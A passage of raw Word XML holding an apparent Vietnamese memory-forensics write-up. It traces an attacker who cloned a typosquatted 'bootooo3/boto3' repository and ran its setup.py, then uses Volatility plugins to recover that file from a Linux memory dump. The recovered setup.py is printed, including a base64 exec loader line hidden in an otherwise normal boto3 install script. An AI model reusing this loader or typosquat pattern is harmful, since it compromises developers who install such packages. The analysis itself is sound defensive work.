    <w:p w14:paraId="2BEB5E65" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">    1295 bash                 2022-06-16 07:17:08 UTC+0000   sudo poweroff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F910CF3" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">    1295 bash                 2022-06-16 07:17:08 UTC+0000   history</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAAB252" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">    1295 bash                 2022-06-16 07:17:08 UTC+0000   ip a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0187F14C" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">    1295 bash                 2022-06-16 07:18:32 UTC+0000   cd LiME/src/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5740ADAD" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">    1295 bash                 2022-06-16 07:19:20 UTC+0000   sudo insmod lime-4.15.0-184-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>generic.ko</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> "path=../dump.mem format=lime"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6753A11C" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">    1420 bash                 2022-06-16 07:19:54 UTC+0000   ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E589D9F" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">    1420 bash                 2022-06-16 07:19:54 UTC+0000   pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A38632" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">    1420 bash                 2022-06-16 07:19:54 UTC+0000   ip a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3460172A" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">    1420 bash                 2022-06-16 07:19:54 UTC+0000   history</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6565686B" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">    1420 bash                 2022-06-16 07:19:54 UTC+0000   sudo poweroff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E63B99E" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">    1420 bash                 2022-06-16 07:19:54 UTC+0000   sudo poweroff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D4E00D" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">    1420 bash                 2022-06-16 07:20:45 UTC+0000   ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA44417" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">    1420 bash                 2022-06-16 07:20:50 UTC+0000   git clone https://github.com/bootooo3/boto3.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D4F95F" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">    1420 bash                 2022-06-16 07:20:55 UTC+0000   ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406FBB9B" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">    1420 bash                 2022-06-16 07:20:57 UTC+0000   cd boto3/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197CFA29" w14:textId="77777777" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">    1420 bash                 2022-06-16 07:20:58 UTC+0000   ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2886BD" w14:textId="6A95A9FE" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">    1420 bash                 2022-06-16 07:21:17 UTC+0000   python3 setup.py install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A06302" w14:textId="7CC31495" w:rsidR="00191F7F" w:rsidRDefault="00191F7F" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">Nhận xét </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376D58E9" w14:textId="28A28A83" w:rsidR="00861125" w:rsidRDefault="00861125" w:rsidP="00861125">
      <w:r w:rsidRPr="00861125">
        <w:t xml:space="preserve">git clone </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00505871">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/bootooo3/boto3.git</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="688BB503" w14:textId="77777777" w:rsidR="00861125" w:rsidRDefault="00861125" w:rsidP="00861125">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">attacker tải source từ github trong đó </w:t>
      </w:r>
      <w:r w:rsidRPr="00861125">
        <w:t>repository bootooo3 có dấu hiệu giả mạo package boto3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19958663" w14:textId="0F4FD128" w:rsidR="00191F7F" w:rsidRDefault="00861125" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">sau khi tải repo về attacker </w:t>
      </w:r>
      <w:r>
        <w:t>cd boto3/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> để thực thi script setup.py. Vì vậy giờ cần recover file setup.py để xem nội dung của script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5530D699" w14:textId="77777777" w:rsidR="00861125" w:rsidRDefault="00861125" w:rsidP="00191F7F">
      <w:r w:rsidRPr="00861125">
        <w:t>plugin linux_psenv và PID 1451 là PID của process python3, có thể xác định file setup.py nằm trong thư mục /home/developer/boto3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D18952" w14:textId="0F6FF5AE" w:rsidR="00861125" w:rsidRDefault="00861125" w:rsidP="00191F7F">
      <w:r w:rsidRPr="00861125">
        <w:t>vol2 -f dump.mem --profile=LinuxUbuntu_4_15_0-184-generic_profilex64 linux_psenv -p 1451</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D77FE1" w14:textId="0093E95E" w:rsidR="00861125" w:rsidRDefault="00861125" w:rsidP="00191F7F">
      <w:r w:rsidRPr="00861125">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="456C6B54" wp14:editId="7851220C">
            <wp:extent cx="5943600" cy="1986280"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="23747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71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AB77" w14:textId="77777777" w:rsidR="00861125" w:rsidRDefault="00861125" w:rsidP="00191F7F">
      <w:r>
        <w:t xml:space="preserve">Tiếp tục dùng </w:t>
      </w:r>
      <w:r w:rsidRPr="00861125">
        <w:t xml:space="preserve">plugin linux_find_file để tìm địa chỉ inode của file setup.py trong page cache, </w:t>
      </w:r>
      <w:r>
        <w:t>để có</w:t>
      </w:r>
      <w:r w:rsidRPr="00861125">
        <w:t xml:space="preserve"> thể trích xuất file ra để phân tích.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB1B0C2" w14:textId="3159179D" w:rsidR="00861125" w:rsidRDefault="00861125" w:rsidP="00191F7F">
      <w:r w:rsidRPr="00861125">
        <w:t xml:space="preserve">vol2 -f dump.mem --profile=LinuxUbuntu_4_15_0-184-generic_profilex64 linux_find_file -F "/home/developer/boto3/setup.py" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5782D9B1" w14:textId="3C023F42" w:rsidR="00861125" w:rsidRDefault="00861125" w:rsidP="00191F7F">
      <w:r w:rsidRPr="00861125">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D419A72" wp14:editId="1A511B73">
            <wp:extent cx="5943600" cy="2153920"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="35308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9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472" w14:textId="3BBC9FB9" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Biết được địa chỉ inode của file setup.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> là </w:t>
      </w:r>
      <w:r w:rsidRPr="00A35380">
        <w:t>0xffff914f7c197038, tiếp tục dùng plugin linux_find_file với tham số -i để trích xuất file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E01DCB" w14:textId="6B13F783" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:lastRenderedPageBreak/>
        <w:t>vol2 -f dump.mem --profile=LinuxUbuntu_4_15_0-184-generic_profilex64 linux_find_file -i 0xffff914f7c197038 -O recover/setup.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D24C5F" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>#!/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>usr/bin/env python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC891E8" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>exec(__import__('base64').b64decode('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'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4592505E" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380"/>
    <w:p w14:paraId="1921ECE2" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45895F8F" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>distutils/setuptools install script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4223D966" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7457FFD5" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>import os</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6EFE9027" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>import re</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36ED1916" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380"/>
    <w:p w14:paraId="40E830A4" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>setuptools</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve"> import find_packages, setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269EE0A4" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380"/>
    <w:p w14:paraId="381CBDFC" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">ROOT = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>os.path</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>.dirname(__file__)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B12E2F" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">VERSION_RE = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>re.compile</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>r''</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>'__version__ = ['</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>"](</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>[0-9</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>.]+)['"]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>''')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45459F69" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380"/>
    <w:p w14:paraId="1B014CEC" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>requires = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF0C20B" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>    'botocore&gt;=1.27.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>9,&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>1.28.0',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E50DE55" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>    'jmespath&gt;=0.7.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>1,&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>2.0.0',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6E67E0" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>    's3transfer&gt;=0.6.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>0,&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>0.7.0',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4993E619" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EF324F" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380"/>
    <w:p w14:paraId="7869E9BF" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>def get_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>version(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1239378E" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">    init = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>open(os.path</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>join(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>ROOT, 'boto3', '__init__.py')</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>).read</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3814FD1B" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>    return VERSION_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>RE.search</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>(init</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>).group</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183EC955" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380"/>
    <w:p w14:paraId="3BBE7129" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>setup(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1407FCFA" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>    name='boto3',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1180B673" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>    version=get_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>version(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E41307" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>    description='The AWS SDK for Python',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BA9E53" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>    long_description=open('README.rst'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>).read</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1358CB7E" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>    author='Amazon Web Services',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508365A2" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>    url='https://github.com/boto/boto3',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDECEEB" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>    scripts</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>=[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB4E9C3" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>    packages=find_packages(exclude=['tests*']),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70788FE4" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>    package_data</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>={</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>'boto3': ['data/aws/resources/*.json', 'examples/*.rst</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>']}</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C35048E" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>    include_package_data=True,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FC969F" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>    install_requires=requires,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2B4634" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>    license="Apache License 2.0",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5030F6DB" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:lastRenderedPageBreak/>
        <w:t>    python_requires="&gt;= 3.7",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017B11B8" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>    classifiers</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>=[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6963715F" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">        'Development </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>Status :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>: 5 - Production/Stable',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270125D4" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">        'Intended </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>Audience :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>: Developers',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7214EC90" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">        'Natural </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>Language :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>: English',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C43325" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>        '</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>License :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">: OSI </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>Approved :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>: Apache Software License',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEADC66" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">        'Programming </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>Language :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>: Python',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4915F33F" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">        'Programming </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>Language :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>Python :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>: 3',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A218895" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
